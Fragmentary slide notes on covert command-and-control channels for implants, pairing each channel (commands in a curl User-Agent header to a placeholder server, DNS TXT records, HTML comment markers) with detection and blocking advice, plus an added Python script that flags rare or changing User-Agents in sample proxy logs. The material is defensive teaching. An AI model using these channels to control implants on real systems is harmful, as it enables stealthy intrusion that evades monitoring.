◦ Negotiation-based, low latency
◦ Good for live interaction
◦ e.g. TCP, SSH, RDP
• Indirect = Connect to intermediate server
◦ Stealthy, high latency
◦ Good for asynchronous commands / responses
◦ e.g. P2P, social media posts, HTML comments
Give me your information
• Start_Interaction = I want a command session
• Transfer_File = Send a particular file
• Execute_Command = Run and send the results
process
◦ Firewall = IP + port access lists
• Gateway, Routing:
◦ DNS sinkhole = blacklist suspicious domains
◦ IDS = drop connections with scary data
◦ Protocol filtering = inspect packets
and replies
curl $server -A "AppleWebKit/531.($command)"
Detection: Look for uncommon User-Agents
Blocking: Use a web proxy to standardize outgoing UAs (e.g. fake_user_agent in squid)
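An added example (not from the original slides) of the detection the "uncommon User-Agents" bullet calls for: it parses constructed combined-format proxy log lines and flags User-Agents seen on very few clients, plus clients whose User-Agent changes between requests, which is what a command carried in the UA header looks like from the proxy side. The log format, client IPs and UA strings are assumed sample data.

```python
"""Flag User-Agent strings that look like a C2 channel in proxy access logs."""
import re
from collections import defaultdict

# Constructed sample lines (not real traffic) in a combined-style proxy log:
# client_ip - - [time] "request" status bytes "referer" "user-agent"
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET http://example.com/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 Chrome/120.0 Safari/537.36"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET http://example.com/news HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 Chrome/120.0 Safari/537.36"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET http://example.com/ HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 Chrome/120.0 Safari/537.36"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET http://c2.example.net/ HTTP/1.1" 200 64 "-" "AppleWebKit/531.(cmd1)"
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET http://c2.example.net/ HTTP/1.1" 200 64 "-" "AppleWebKit/531.(cmd2)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \d+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse(lines):
    """Yield (client_ip, user_agent) for every line that matches the log format."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.group("ip"), m.group("ua")


def rare_user_agents(lines, min_clients=2):
    """UAs seen from fewer than min_clients distinct client IPs -> {ua: [ips]}.
    A real browser build shows up on many hosts; a per-implant string does not."""
    clients = defaultdict(set)
    for ip, ua in parse(lines):
        clients[ua].add(ip)
    return {ua: sorted(ips) for ua, ips in clients.items() if len(ips) < min_clients}


def ua_churn(lines, max_uas=1):
    """Clients that sent more than max_uas distinct UAs -> {ip: count}.
    A UA that changes per request is carrying data, not identifying software."""
    uas = defaultdict(set)
    for ip, ua in parse(lines):
        uas[ip].add(ua)
    return {ip: len(s) for ip, s in uas.items() if len(s) > max_uas}


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("rare UAs:", rare_user_agents(lines))
    print("UA churn:", ua_churn(lines))
```

On real logs, raise min_clients to match the fleet size and baseline against a known-good UA list before alerting, since a single host on a new browser build will also show up as rare.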
record
Implant parses DNS TXT record for domain
dig $domain txt
Detection: Log DNS queries and investigate odd ones
Blocking: Run your own DNS, never ask for authoritative records, only cache from trusted sources
from between markers
<!-- marker $command marker -->
Detection: very difficult
Blocking: Use a web proxy to filter incoming comments (e.g. ProxyHTMLStripComments On in squid)